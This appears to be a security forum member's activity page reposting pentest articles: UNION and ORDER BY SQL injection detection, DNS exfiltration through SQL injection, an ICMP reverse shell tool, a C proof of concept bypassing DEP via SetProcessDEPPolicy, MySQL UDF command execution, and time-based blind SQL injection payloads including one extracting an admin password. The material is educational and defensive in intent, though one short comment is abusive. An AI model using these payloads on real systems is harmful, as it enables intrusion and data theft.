Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18790

  • Joined

  • Last visited

  • Days Won

    738

 Content Type 

Everything posted by Nytro

  1. Nytro
    ACAB. De vina pentru asta sunt politistii, sclavii jegosilor, mancatorii de cacat.
  2. Nytro
    Play Flappy Bird Highscore: 1337 Challenge: schimbati highscore. (e usor)
  3. Nytro
    [h=1] Insight on UNION query SQL injection[/h] Last week I wrote about DBMS fingerprint through inband SQL injection (also known as UNION query SQL injection) assuming that a web application parameter is affected by such type of SQL injection threat. Today I will keep the same scenario to focus on the detection of the inband SQL injection vulnerability, which is a prerequirement to exploit it performing the DBMS fingerprint and any other possible attack. There are mainly two techniques to detect if the vulnerable URL parameter is affected by an inband SQL injection vulnerability: UNION ALL SELECT NULL ORDER BY UNION ALL SELECT NULL The trick here is to perform the HTTP request taking advantage of the SQL syntax standard UNION ALL statement. Appending to the vulnerable parameter the UNION ALL SELECT NULL statement N times as long as we do not get any DBMS error messages. Common DBMS error messages when the occurences of NULL differ from the number of table columns are: MySQL: The used SELECT statements have a different number of columnsPostgreSQL: each UNION query must have the same number of columnsMicrosoft SQL Server: All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target listsOracle: ORA-01789: query block has incorrect number of result columnsIn our scenario at first request (with only one NULL) we will get a DBMS error message (similar to one of the aboves) or a blank page (if the administrator configured the web server not to return error messages), so we will request http://example/index.php?id=1 UNION ALL SELECT NULL, NULL and we will get a normal page, without any DBMS error message: the remote SELECT query is on a table with two columns and we can append data through the UNION ALL SELECT statement. ORDER BY This technique consists in performing the HTTP request taking advantage of the SQL syntax standard ORDER BY statement. Appending to the vulnerable parameter the ORDER BY NUM statement incrementing the number NUM as long as we do not get any DBMS error messages. Common DBMS error messages when the number NUM is greather than the number of table columns are: MySQL: Unknown column 'NUM' in 'order clause'PostgreSQL: ORDER BY position NUM is not in select listMicrosoft SQL Server: The ORDER BY position number NUM is out of range of the number of items in the select listOracle: ORA-01785: ORDER BY item must be the number of a SELECT-list expressionIn our scenario at first request (http://example/index.php?id=1 ORDER BY 1) we will not get the normal page (the query output will be sorted alphabetically based on the first table column values), so we will request http://example/index.php?id=1 ORDER BY 2 and we will get again a normal page. Now we already know that the table has two or more columns. Now requesting http://example/index.php?id=1 ORDER BY 3 we will get a DBMS error message (similar to one of the aboves) or a blank page (if the administrator configured the web server not to return error messages): the remote SELECT query is on a table with two columns and we can append data through the UNION ALL SELECT statement. EXPLOITING Both techniques are valid, but probably ORDER BY is more reliable on some custom DBMS/web application settings where, for example, NULL is not allowed as column type: quite rare case, but it can happens. Once we know how many columns there are in the table we have to check if the inband SQL injection is effectively visible (exploitable). In our scenario we can request http://example/index.php?id=1 UNION ALL SELECT NULL, '1234' and if the string 1234 appears in the HTML source code of the HTTP response page, we have an exploitable SQL injection. Remember to correctly encode with a DBMS CHAR() or similar function the strings to evade magic_quotes_gpc and some other security settings. I will illustrate some possible security settings evasion techniques in a future post. Now that we have an exploitable inband SQL injection we are ready to take advantage of this threat in our penetration test, for example performing a remote DBMS fingerprint [1] [2], usually the second step when exploiting this web applications vulnerability. NOTES The ALL is strongly advised to evade DISTINCT if present in the original web application SELECT query. The columns entries data type must fit: usually NULL fits all DBMS data types. The point here is to find a string (depending on the remote DBMS varchar, bpchar, etc) where inject our query. In our scenario being the remote DBMS MySQL it will work also in the first column even if it is an integer (int) because MySQL is not too restrictive in data types matching. In case the web application SELECT statement is similar to "SELECT id, name FROM testtable WHERE id=" . $_GET['id'] . " LIMIT 0, 1" we can evade the SQL syntax LIMIT by commenting our own injected query at the end, for instance requesting http://example/index.php?id=1 UNION ALL SELECT NULL, NULL-- where '--' starts a valid SQL comment in MySQL, Microsoft SQL Server and others DBMS. Implementation on sqlmap code: inband SQL injection library Posted 11th July 2007 by Bernardo Damele Sursa: Bernardo Damele A. G.: Insight on UNION query SQL injection
  4. Nytro
    Data Retrieval over DNS in SQL Injection Attacks Miroslav Štampar AVL-AST d.o.o., Zagreb, Croatia miroslav.stampar@avl.com Abstract This paper describes an advanced SQL injection technique where DNS resolution process is exploited for retrieval of malicious SQL query results. Resulting DNS requests are intercepted by attackers themselves at the controlled remote name server extracting valuable data. Open source SQL injection tool sqlmap [1] has been adjusted to automate this task. With modifications done, attackers are able to use this technique for fast and low-profile data retrieval, especially in cases where other standard ones fail. Introduction Exfiltration is a military term for removal of assets from within enemy territory by covert means. It now has an excellent modern usage in computing, meaning the illicit extraction of data from a system. The most covert data extraction method is considered to be the Domain Name Server (DNS) exfiltration [2]. This method can even be used on systems without a public network connection by resolving domain name queries outside the perimeter of trusted hosts through a series of internal and external name servers. DNS is a relatively simple protocol. Both the query made by a DNS client and the corresponding response provided by a DNS server use the same basic DNS message format. With the exception of zone transfers, which use TCP for the sake of reliability, DNS messages are encapsulated within a UDP datagram. To someone monitoring a machine with a tool like Wireshark [3], a covert channel implemented over DNS would look like a series of little blips that flash in and out of existence [4]. The act of relaying DNS queries from secure systems to arbitrary internet-based name servers forms the basis of this uncontrolled data channel. Even if we assume that connections to public networks are not allowed, if the target host is able to resolve arbitrary domain names, data exfiltration is possible via forwarded DNS queries [5]. When other faster SQL injection (SQLi) data retrieval techniques fail, data is usually retrieved in bit-by-bit manner, which is very noisy1 and time consuming process. Thus, attackers will typically need tens of thousands of requests to retrieve content of a regular sized table. What is going to be described is the technique where attackers can retrieve results for malicious SQL queries (e.g. administrator password) by provoking specially crafted DNS requests from vulnerable Database Management System (DBMS) and intercepting those at the other end, transferring dozens of resulting characters per single iteration. Download: http://arxiv.org/pdf/1303.3047.pdf
      • 1
      • Upvote
  5. Nytro
    [h=1]Reverse connection: ICMP shell[/h] Background Sometimes, network administrators make the penetration tester's life harder. Some of them do use firewalls for what they are meant to, surprisingly!Allowing traffic only onto known machines, ports and services (ingress filtering) and setting strong egress access control lists is one of these cases. In such scenarios when you have owned a machine part of the internal network or the DMZ (e.g. in a Citrix breakout engagement or similar), it is not always trivial to get a reverse shell over TCP, not to consider a bind shell. However, what about UDP (commonly a DNS tunnel) or ICMP as the channel to get a reverse shell? ICMP is the focus on this post. Surfing the Net I found two handy tools to get a reverse shell over ICMP: soicmp - Developed in Python. Some useful features like the possibility to run soicmp daemon on multiple ethernet interfaces simultaneously handling multiple client connections. Unfortunately it uses RAW_SOCKETS on both client and server. You'll need the highest system privileges (root / administrator) to successfully run it on both endpoints. This means that you need root privileges onto the target system that you have owned, which might not always be the case. It is cross-platform. Also, it looks to me that it is unmaintained as of 2006-10-26. icmpshell - Developed in C. As per soicmp, it uses raw sockets on both the client and server side, therefore root privileges are required to use this program. It works on POSIX systems only, no support for Windows. Also, it looks to me that it is unmaintained as of 2002-02-06. icmpsh Last year a friend of mine coded a tool called icmpsh. It implements the reverse ICMP shell concept very well. The main advantage over the other open source tools is that it does not require administrative privileges to run onto the target machine. I spent some time playing with the tool and was immediately impressed. It is clean, easy and portable. The slave (client) runs on the target machine, it is written in C and works on Windows only whereas the master (server) can run on any platform as it has been implemented in C and Perl by Nico. I ported it to Python too. The reason for the Python port is that I wrapped it into sqlmap too. As of version 0.9 stable you can either establish the out-of-band connection via TCP with Metasploit or via ICMP with icmpsh - switch --os-pwn. Features Open source software - primarily coded by Nico, forked by me. Client/server architecture. The master is portable across any platform that can run either C, Perl or Python code. The target system has to be Windows because the slave runs on that platform only for now. The user running the slave on the target system does not require administrative privileges. Example Running icmpsh slave on target system (192.168.136.129) by specifying the master IP 192.168.136.1 Running icmpsh master on attacker machine (192.168.136.1) and issuing two OS commands onto the target system (192.168.136.129) Response packet from icmpsh slave containing output of issued command whoami The forked tool can be found on my GitHub at https://github.com/inquisb/icmpsh. Feedback is always welcome! Posted 15th April 2011 by Bernardo Damele Sursa: Bernardo Damele A. G.: Reverse connection: ICMP shell
  6. Nytro
    DEP bypass with SetProcessDEPPolicy() Data Execution Prevention (DEP) was introduced in Windows XP SP2 and is included in Windows XP Tablet PC Edition 2005, Windows Server 2003 Service Pack 1 and later, Windows Vista Service Pack 0 and later, and Windows Server 2008 Service Pack 0 and later, and all newer versions of Windows. Hardware-enforced DEP, for CPUs that support NX (AMD) or XD (Intel) bits, enforces non-executable pages, basically it marks the stack/part of the stack as non-executable, thus preventing the execution of arbitrary shellcode residing on the stack. When the processor/system has NX/XD support/enabled, then Windows DEP is hardware DEP. Compilers such as Visual Studio C++ offer a link flag (/NXCOMPAT) that will enable applications for DEP protection. It's enabled by default since it was introduced in Visual Studio 2005. DEP can be circumvented in a number of ways by an attacker while exploiting a buffer overflow vulnerability to successfully achieve arbitrary command execution or, generally speaking, "successful shellcode run" when it resides on the stack. Some of these techniques are: Return-to-libc with a call to WinExec() widely covered in many papers and slides. ZwProtectVirtualMemory researched and explained on John's blog. NtSetInformationProcess initially researched by skape and Skywing and explained in an Uninformed article titled Bypassing Windows Hardware-enforced Data Execution Prevention. This is the widely known and used technique in most of publicly available exploits that bypass hardware-enforced DEP. SetProcessDEPPolicy, discussed in this blog post. SetProcessDEPPolicy() API has been "silently" added to Windows Vista SP1, Windows XP SP3 and Windows Server 2008. Michael Howard wrote a post on his blog back in early 2009 on how to use this function to set DEP for the current process from a developer perspective; I found it fairly well documented on MSDN too. It has also been mentioned back in summer 2008 by Alexander Sotirov and Mark Dowd in their Black Hat USA presentation titled Bypassing Browser Memory Protections. Apart from these references, I did not find on the Internet any proof of concept demonstrating in practice how to abuse this API while exploiting a buffer overflow vulnerability to bypass hardware-enforced DEP so I wrote the following proof of concept and hope it might be of help to other people too. In my opinion this technique is the simplest among the ones I have mentioned: it does not require any stack or registers alignment to be in place before the function is called. The only drawback is that it is not supported on Windows 2003 My test environment is a Windows XP Professional SP3 English updated on December 9, 2009 with DEP manually set to OptOut so enabled for all processes except the ones that are put in the exception list and the following proof of concept is not. DEP manually set to OptOut on Windows XP with no exceptions The source code has been compiled with Microsoft Visual C++ 2008 Express Edition in Release mode with the default flags. This includes /NXCOMPAT and /GS flags. Buffer Security Check (stack cookie, /GS flag) does not need to be bypassed in this specific case because the string buffer that we are going to overflow, buf, is long 4 bytes, so the compiler does not add the stack cookie to the useSetProcessDEPPolicy() function for performance reasons. Remember that strict_gs_check pragma by default is turned off. The following screenshot of Immunity Debugger shows that the shellcode (INT 3 instruction only in this PoC) has been successfully executed after DEP has been disabled abusing SetProcessDEPPolicy(). If DEP was not disabled, an Access Memory Violation would have been raised and the process would have been terminated. Follows the proof of concept: /*This is a proof of concept of buffer overflow exploitation with DEP bypass on Windows XP Professional SP3 english updated on December 9, 2009 with DEP manually set to OptOut so enabled for all processes, except the ones that are put in the exception list and this program is not. This source has been compiled with Microsoft Visual C++ 2008 Express Edition in Release mode with the default flags. This includes /NXCOMPAT and /GS. Buffer Security Check (stack cookie, /GS flag) does not need to be bypassed because the string buffer, buf, in this example is long 4 bytes, so the compiler does not add the GS cookie to the useSetProcessDEPPolicy() function. Remember that strict_gs_check pragma by default is turned off. References: * 'New NX APIs added to Windows Vista SP1, Windows XP SP3 and Windows Server 2008' by Michael Howard, http://blogs.msdn.com/michael_howard/archive/2008/01/29/new-nx-apis-added-to-windows-vista-sp1-windows-xp-sp3-and-windows-server-2008.aspx * SetProcessDEPPolicy Function, http://msdn.microsoft.com/en-us/library/bb736299%28VS.85%29.aspx Feel free to write me for comments and questions, Bernardo Damele A. G. <bernardo.damele@gmail.com> */ #include <windows.h> #include <stdlib.h> void useSetProcessDEPPolicy() { char buf[4]; /* Overflow the string buffer and EBP register. */ strcpy(buf, "AAAABBBB"); /* SetProcessDEPPolicy() API has been added to Windows Vista SP1, Windows XP SP3 and Windows Server 2008 and can be abused by an attacker while exploiting a buffer overflow vulnerability to disable hardware-enforced DEP (NX/XD bit) for the running process. Overwrite EIP with the address of SetProcessDepPolicy() API, which is 0x7c8622a4 on a Windows XP SP3 English 32bit system updated on December 9, 2009. NOTE: You might need to adapt it depending on your system patch level. */ memcpy(buf+8, "\xa4\x22\x86\x7c", 4); /* Return address of SetProcessDepPolicy(). Use an address of a JMP ESP instruction in kernel32.dll to jump to our shellcode on the top of the stack. NOTE: You might need to adapt it depending on your system patch level. */ memcpy(buf+12, "\x13\x44\x87\x7c", 4); /* Argument for SetProcessDepPolicy(). 0x00000000 turn off DEP for this process. */ memcpy(buf+16, "\x00\x00\x00\x00", 4); /* The shellcode to be executed after DEP has been disabled. For instance, a breakpoint (INT 3 instruction) to call the debug exception handler which will pause the process. */ memcpy(buf+20, "\xcc", 1); } int main() { useSetProcessDEPPolicy(); return 0; } This source code can also be found here. Posted 9th December 2009 by Bernardo Damele Sursa: Bernardo Damele A. G.: DEP bypass with SetProcessDEPPolicy()
  7. Nytro
    [h=1]Command execution with a MySQL UDF[/h]Modern database management systems are powerful applications: they provide several instruments to interact with the underlying operating system. On MySQL it is possible to create a User-Defined Function to execute commands on the underlying operating system. Marco Ivaldi demonstrated that some years ago. His raptor_udf2.c works well, but it has two limitations: It is not MySQL 5.0+ compliant because it does not follow the new guidelines to create a proper UDF. It calls C function system() to execute the command and returns always integer 0. These limitations make the UDF almost useless on recent MySQL server installations if the database administrator wants to get the exit status of the command as UDF output or the command standard output itself. I recently came across an open repository of MySQL User-Defined Functions maintained by Roland Bouman and other developers. One of their codes kept my attention: lib_mysqludf_sys (version 0.0.2) which implements three different functions to interact with the underlying environement: sys_exec: executes an arbitrary command, and can thus be used to launch an external application. sys_get: gets the value of an environment variable. sys_set: create an environment variable, or update the value of an existing environment variable. The first function can be used to execute operating system commands and has two advantages over raptor's UDF: It is MySQL 5.0+ compliant and it compiles on both Linux as a shared object and on Windows as a dynamic-link library. It returns the exit status of the executed command. However, none of these two functions return the command standard output so I took some time to patch this last source code adding a sys_eval() UDF to return the standard output of the command if it success, NULL otherwise. The patched source code can be found on sqlmap subversion repository here and a single patch file for the original lib_mysqludf_sys version 0.0.2 is available here. Usage example: [/FONT][/FONT]$ wget --no-check-certificate https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/mysqludfsys/lib_mysqludf_sys_0.0.3.tar.gz $ tar xfz lib_mysqludf_sys_0.0.3.tar.gz $ cd lib_mysqludf_sys_0.0.3 $ sudo ./install.sh Compiling the MySQL UDF gcc -Wall -I/usr/include/mysql -I. -shared lib_mysqludf_sys.c -o /usr/lib/lib_mysqludf_sys.so MySQL UDF compiled successfully Please provide your MySQL root password Enter password: MySQL UDF installed successfully $ mysql -u root -p mysql Enter password: [...] mysql> SELECT sys_eval('id'); +--------------------------------------------------+ | sys_eval('id') | +--------------------------------------------------+ | uid=118(mysql) gid=128(mysql) groups=128(mysql) | +--------------------------------------------------+ 1 row in set (0.02 sec) mysql> SELECT sys_exec('touch /tmp/test_mysql'); +-----------------------------------+ | sys_exec('touch /tmp/test_mysql') | +-----------------------------------+ | 0 | +-----------------------------------+ 1 row in set (0.02 sec) mysql> exit Bye $ ls -l /tmp/test_mysql -rw-rw---- 1 mysql mysql 0 2009-01-16 23:18 /tmp/test_mysql[FONT=trebuchet ms][FONT=courier new] UPDATE on January 25, 2009: Roland Bouman uploaded to the MySQL User-Defined Functions repository my patched version of lib_mysqludf_sys. He also updated its manual page. You can now get version 0.0.3 also from his repository. PacketStormSecurity.org and milw0rm.com mirrored it here and here. Posted 16th January 2009 by Bernardo Damele Sursa: Bernardo Damele A. G.: Command execution with a MySQL UDF
  8. Nytro
    Recycle Bin Forensics An icon on the Windows desktop represents a directory in which deleted files are temporarily stored. This enables you to retrieve files that you may have accidentally deleted. From time to time, you’ll want to purge the recycle bin to free up space on your hard disk. You can also configure Windows so that it doesn’t use the recycle bin at all, but then you won’t be able to retrieve accidentally deleted files. When a file is deleted in the Microsoft Windows operating system, it doesn’t delete it permanently; it is stored in the recycle bin. If a user wants to restore the deleted file from the recycle bin, it can be done. If the user holds the shift key at the time of deleting a file, then the file will be deleted permanently without being stored in the recycle bin. In this case, the file is moved to a hidden, system folder where it is renamed and stored until further instructions are given as to what is to happen to the file. From the forensic point of view, the recycle bin is a gold mine for gathering evidence, clues, etc. By analyzing the recycle bin, we can recover useful data. To understand how the information files are structured and how the naming convention works, there must first be an understanding of how the recycle bin works. When a user “deletes” a file in Windows, the file itself is not actually deleted. The file at this point is copied into the recycle bin’s system folder, where it is held until the user gives further instructions on what to do with the file. This location varies, depending on the version of Windows the user is running. The table below shows locations from both past versions of Windows as well as Windows Vista. Here we will see how to analyze the INFO2 file for the Windows XP operating system. First check out the Recycler folder on C drive. The Recycler folder is a hidden directory, so we have to make some changes in the folder options to view that directory. Open “Folder Options,” then select “Show hidden files and folders” under the “Hidden files and folders” section. Uncheck “Hide protected operating system files” and you are done. Once the changes have been made, browse the C drive and you can see the Recycler folder clearly. Inside the Recycler folder, there’ll be a another folder with a name like “S-1-5-21-1078081533-1957994488-1343024091-1003? or similar. This will be generated for every separate user. In our case, we have only one user in this system; that’s why we have only one. Now navigate to this directory via the command prompt and type dir /a to view all files and folders. In the below figure we can see there is an INFO2 file. Just extract that file to the different location. We can’t normally open that file, so we will use a tool called Rifiuti. Rifiuti is a recycle bin forensic analysis tool. Rifiuti, the Italian word meaning “trash,” was developed to examine the contents of the INFO2 file in the recycle bin. Next put the INFO2 file inside the Rifiuti folder and run rifiuti.exe via the command prompt. We can see the Rifiuti usage command after running the rifiuti.exe. Now type in rifiuti.exe INFO2 >result.txt After running the command, the program will create a result.txt file in the rifuiti folder. Open the result.txt file. Now we can clearly see the details of every files. The deleted time of the file, from which drive it was deleted, the drive number and the file size. References: McAfee—Antivirus, Encryption, Firewall, Email Security, Web Security, Risk & Compliancedownloads/free-tools/rifiuti.aspx What is INFO2 File Hidden in Recycled or Recycler Folder? • Raymond.CC By Rohit Shaw|February 12th, 2014 Sursa: Recycle Bin Forensics - InfoSec Institute
  9. Nytro
    [h=1]Free Password Hash Cracker[/h] [h=2]ow CrackStation Works[/h] CrackStation uses massive pre-computed lookup tables to crack password hashes. These tables store a mapping between the hash of a password, and the correct password for that hash. The hash values are indexed so that it is possible to quickly search the database for a given hash. If the hash is present in the database, the password can be recovered in a fraction of a second. This only works for "unsalted" hashes. For information on password hashing systems that are not vulnerable to pre-computed lookup tables, see our hashing security page. Crackstation's lookup tables were created by extracting every word from the Wikipedia databases and adding with every password list we could find. We also applied intelligent word mangling (brute force hybrid) to our wordlists to make them much more effective. For MD5 and SHA1 hashes, we have a 190GB, 15-billion-entry lookup table, and for other hashes, we have a 19GB 1.5-billion-entry lookup table. You can download CrackStation's dictionaries here, and the lookup table implementation (PHP and C) is available here. https://crackstation.net/
  10. Nytro
    Time-Based Blind SQL Injection with Heavy Queries Published: September 12, 2007 By Chema Alonso, Microsoft Security MVP Introduction This article describes how attackers take advantage of SQL Injection vulnerabilities by using time-based blind SQL injection with heavy queries. Our goal is to highlight the need for establishing secure development best practices for Web applications instead of relying only on the security provided by the perimeter defenses. This article shows exploit examples for Microsoft SQL Server and Microsoft Access database engines, but the present technique is applicable to any other database product in the market. Time-Based Blind SQL Injection The first references to “blind attacks” can be found in Chris Anley’s June 2002 paper “(More) Advanced SQL Injection” [1], in which he calls attention to the possibility of creating such attacks -- in this specific case, time-based, one of the less common. Chris gives some examples of blind SQL injection techniques: <<•••••• if (ascii(substring(@s, @byte, 1)) & ( power(2, @BIT))) > 0 waitfor delay '0:0:5' …it is possible to determine whether a given bit in a string is '1' or ’0’.That is, the above query will pause for five seconds if bit @BIT' of byte @byte' in string '@s' is '1.' For example, the following query: declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s, 1, 1)) & ( power(2, 0))) > 0 waitfor delay '0:0:5' will pause for five seconds if the first bit of the first byte of the name of the current database is 1. As these examples show, the information is extracted from the database using a vulnerable parameter. Code is then injected to generate a delay in response time when the condition is true. After this first reference, blind SQL injection techniques continued to be studied with most techniques generating error messages from the attack system, because of the simplicity, quick execution, and extension of showing an error message versus delaying the database. One year later, in September 2003, Ofer Maor and Amichai Shulman published the paper “Blindfolded SQL Injection” [2]. Here, they analyze different ways to identify a vulnerable parameter on a SQL Injection system, even when the information processed and returned by the system is not visible. At the 2004 BlackHat Conference, Cameron Hotchkies presented his paper “Blind SQL Injection Automation Techniques” [3]. He proposed alternative methods to automate the exploitation of a Blind SQL Injection vulnerable parameter, using different custom tools. He suggested three different solutions for the automation: (1) Searching for keywords on positive and negative results; (2) Using MD5 signatures to discriminate positive and negative results; (3) Using textual difference engine. He also introduced SQueal, an automatic tool to extract information through Blind SQL Injection, which evolved later to another tool called Absinthe [4]. In September 2005, David Litchfield published the article “Data Mining with SQL Injection and Inference” [5], where he discussed the time-based inference techniques, and proposed other ways to obtain time delays using calls to stored procedures, such as xp_cmdshell on MS SQL Server to do a ping. xp_cmdshell ‘ping –n 10 127.0.0.1’ ? application paused 10 seconds. Time-based techniques can be extended to any action performed by a stored procedure and able to generate a time delay or any other measurable action. In December 2006, Ronald van den Heetkamp published the “SQL Injection Cheat Sheet” [6], including Blind SQL Injection tricks for MySQL with some examples based on benchmark functions that can generate time delays. For instance: SELECT BENCHMARK(10000000,ENCODE('abc','123')); [around 5 sec] SELECT BENCHMARK(1000000,MD5(CHAR(116))) [ around 7 sec] Example: SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login A recent exploit [7], published in June 2007 at http://www.milw0rm.com (a Web site dedicated to exploits and security) shows how this technique could be used to attack a game server called Solar Empire: ¡$sql="F***You'),(1,2,3,4,5,(SELECT IF (ASCII (SUBSTRING(se_games.admin_pw, ".$j.", 1)) =".$i.") & 1, benchmark(200000000,CHAR(0)),0) FROM se_games))/*"; As the studies of the time-based Blind SQL Injection techniques are moving forward, some new tools have been created, such as SQL Ninja [8], which uses the Wait-for method for Microsoft SQL Server engines, or SQL PowerInjector[9], which implements the Wait-for method for Microsoft SQL Server Database engines, Benchmark functions for MySQL engines, and an extension of the Wait-for method for Oracle engines, using calls to DBMS_LOCK methods. Articol complet: Time-Based Blind SQL Injection with Heavy Queries
  11. Nytro
    Oracle Password Checker (Cracker) Checkpwd 1.23 (free) Checkpwd 1.23 is one of the fastest (see Benchmark) dictionary based password checker for Oracle databases. This is a useful tool for DBA's to identify Oracle accounts with weak or default passwords. Version 1.23 contains a version which only shows that a password is weak but not the password itself. Checkpwd reads the password hashes from the view dba_users and compares the hashkeys with the hashkeys calculated from a dictionary file. Details about Oracle (database) passwords are available here: Fact Sheet about Oracle database passwords. Downloads Checkpwd 1.23 (for Windows) + default passwords + libaries + wordlist with 1.5 Mio words + Oracle Instant Client 10.2 (35 MB, MD5SUM: d41737cca1b07d66bd134c53989fa1b5 *oracle_checkpwd_big.zip) Checkpwd 1.23 (for Windows) + default passwords + libaries (1.5 MB, MD5SUM: 17a00e28b9ff0e6bed45554b43f62b06 *oracle_checkpwd.zip) Checkpwd 1.23 - passwords not displayed - (for Windows) + default passwords + libaries (1.5 MB, MD5SUM: 6638b0c82dea7685b6e045c9f7136168 *oracle_checkpwd_nopw.zip) Checkpwd 1.23 (for Linux) + default passwords + Instant Client 10.2 (42 MB, MD5SUM: aa05f5e7c8a20ec1094e68143085c3a7 *oracle_checkpwd_linux.tar.gz) Checkpwd 1.23 - passwords not displayed - (for Linux) + default passwords + Instant Client 10.2 (42 MB, MD5SUM: b0f356a27f6089275637555fbe70445d *oracle_checkpwd_nopw_linux.tar.gz) Checkpwd 1.23 (for Mac OSX (PPC)) + default passwords + wordlist with 1.5 Mio words + Instant Client 10.1 (48 MB, MD5SUM: fe4608bf25915585adea5bf668ec6569 *oracle_checkpwd_mac_big.tar.gz) Checkpwd 1.23 (for Mac OSX (PPC)) + default passwords (without Instant Client) (56 KB, MD5SUM: 53bfaf05ba7375a576a55d30f4a44319 *oracle_checkpwd_mac.tar.gz) Checkpwd 1.23 - passwords not displayed - (for Mac OSX (PPC)) + default passwords (without Instant Client) (56 KB, MD5SUM: dc4a3c623224055de5a8bac0f076f7a6 *oracle_checkpwd_nopw_mac.tar.gz) Checkpwd 1.23 (for Mac OSX (Intel)) + default passwords + wordlist with 1.5 Mio words + Instant Client 10.1 (37 MB, MD5SUM: be18c958cf1a7af27c7825c9c78c3fa6 *oracle_checkpwd_mac_intel_big.zip) Checkpwd 1.23 (for Mac OSX (Intel)) + default passwords (without Instant Client) (68 KB, MD5SUM: f7d82902baea9df804e55b757c452aa3 *oracle_checkpwd_mac_intel.zip) Checkpwd 1.23 - passwords not displayed - (for Mac OSX (Intel)) + default passwords (without Instant Client) (68 KB, MD5SUM: edac226122e78c7690bef1b0e4780959 *oracle_checkpwd_nopw_mac_intel.zip) Sursa: Oracle Password Cracker (Checker)
  12. Nytro
    [h=1]Offensive Computer Security Spring 2014[/h] [h=1]Spring 2014 Lectures & Videos[/h] This page contains all the lecture Lecture Slides and youtube videos for the Spring 2014 semester of this course. [h=1]Course Lecture Videos / Slides / Reading:[/h] Below you can find and watch all the course videos, required reading, and lecture slides for each lecture (where applicable). The videos hosted on youtube are lower quality than the ones avaiable for direct download (see above). On the left you can find a navigation sidebar which will help you find the lectures relevant to each meta-topic. Restul aici: Offensive Computer Security Home Page (CIS 4930 / CIS 5930) Spring 2014
  13. Nytro
    Si pe Linux cu ce il putem vedea?
  14. Nytro
    Solutie: custom DNS client in browser.
  15. Nytro
    Si cum va primi TheTime notificare daca doar se pune un link in locul numelui?
  16. Nytro
    Inteleg ideea ta generala, dar eu vreau mai detaliat. Luam asa: eu incerc sa creez un topic. Vreau sa se numeasca "Ajutor WiFi". Incep sa tastez "Ajuto.." si ce sa se intample, sa apara titlurile topicurilor care contin "Ajuto"? Dupa ce scriu complet, "Ajutor WiFi", sa apara topicurile cu acel nume, exact acel nume?
  17. Nytro
    Si cum sa se faca mai exact cautarea? Un search simplu si daca exista un topic cu exact acelasi nume sa i se dea link catre el? Ar trebui sa poata insa posta un topic cu acel nume, nu putem cere ca numele unui topic sa fie "primary key".
  18. Nytro
    The Google Web Search API has been officially deprecated as of November 1, 2010 Therefore, we encourage you to move to Custom Search, which provides an alternative solution. Oricum, nu se poate asa. Daca x posteaza "Programul smecher" si y posteaza "Programul smecher v5" si z posteaza "Programul smecher v6" ce faci? E vorba de inteligenta artificiala ca sa functioneze ok. Te trezesti ca nu te lasa sa postezi cu titlul "Ajutor" si multe altele.
  19. Nytro
    Probabil ne va bloca Google si va cere CAPTCHA. In plus, pot fi extrem de multe false positive. Ideea e ok, dar o versiune buna e greu de implementat.
  20. Nytro
    Daca e functional acel plugin, se va "implementa". Dar va garantez ca nu stau eu sa va scriu cod pentru asa ceva. Ma uit maine.
  21. Nytro
    Whatever happened to the IPv4 address crisis? By Lee Schlesinger, Network World February 17, 2014 06:30 AM ET Network World - In February 2011, the global Internet Assigned Numbers Authority (IANA) allocated the last blocks of IPv4 address space to the five regional Internet registries. At the time, experts warned that within months all available IPv4 addresses in the world would be distributed to ISPs. Soon after that, unless everyone upgraded to IPv6, the world would be facing a crisis that would hamper Internet connectivity for everyone. That crisis would be exacerbated by the skyrocketing demand for IP addresses due to a variety of factors: the Internet of Things (refrigerators needing their own IP address); wearables (watches and glasses demanding connectivity); BYOD (the explosion of mobile devices allowed to connect to the corporate network); and the increase in smartphone use in developing countries. So, here we are three years later and the American Registry for Internet Numbers (ARIN) is still doling out IPv4 addresses in the United States and Canada. Whatever happened to the IPv4 address crisis? The day of reckoning still looms – it’s just been pushed out as the major Internet players have developed ingenious ways to stretch those available numbers. But these conservation efforts can only work for so long. ARIN currently has “approximately 24 million IPv4 addresses in the available pool for the region,” according to President and CEO John Curran. They’re available to ISPs large and small, but Curran predicts they will all likely be handed out by “sometime in 2014.” Even then, addresses will still be available to be assigned to the operators' clients for a while longer. And not all operators are likely to experience shortages at the same time. "It's more of a problem for networks that are growing. For networks that are stable, they can reuse addresses" as some customers drop their service and new ones sign up. Phil Roberts, technology program manager for the Internet Society, adds, "There's some anticipation in using addresses. Network operators get a block and parcel them out – you don't get them right when you need them." How did we get here? The problem took no one by surprise. The Internet Engineering Task Force (IETF) foresaw the global growth of network-connected devices 20 years ago, and in response drafted a new version of the Internet Protocol to address the looming shortage. IPv6 uses a 128-bit address space – that is, 2^128 – yielding far more potential addresses than IPv4’s 32-bit scheme, and in fact more addresses than there are grains of sand in the Earth’s crust. So, why hasn’t everyone just switched over to IPv6? Well, IPv6 is not backward compatible with IPv4, meaning network operators need to run a dual stack IPv4/IPv6 network for years to come. And for IPv6 to work, it needs to be implemented end to end, meaning IPv6 has to be enabled by network hardware vendors, transit providers, access providers, content providers, and endpoint hardware makers. Since there’s no economic incentive to being the first to invest in revamping your protocol support, many hardware and service providers stood on the sidelines and waited for momentum to build. Articol complet: https://www.networkworld.com/news/2014/021714-ipv4-278692.html
  22. Nytro
    Antivirusii de mult timp scaneaza arhivele cu parola "infected". S-a trezit si Gogu'. De asemenea, Kaspersky a patentat o metoda de scanare care identifica un fisier infectat intr-o arhiva cu parola (doar ei stiu cum, probabil nu e un algoritm tocmai simplu, insa tot heuristic ramane). Nu cred ca Google face ceva special in acest sens, asta doar daca nu cumva lucreaza la propriul antivirus. Pentru cei care nu stiu, ca si tipu asta, sunt site-uri care "colectioneaza" malware si permit accesul la aceste fisiere pentru analize. Ca malware.lu . Iar descarcarea acestor fisiere se face ca o arhiva zip cu parola "infected", sau cel putin asa se facea. Mai e si Mila: http://contagiodump.blogspot.ro/ La fel, folosea daca imi aduc bine aminte, aceeasi parola. Intre timp, a umblat putin la algoritmul de stabilire a parolei si mai adauga ceva la final.
  23. Nytro
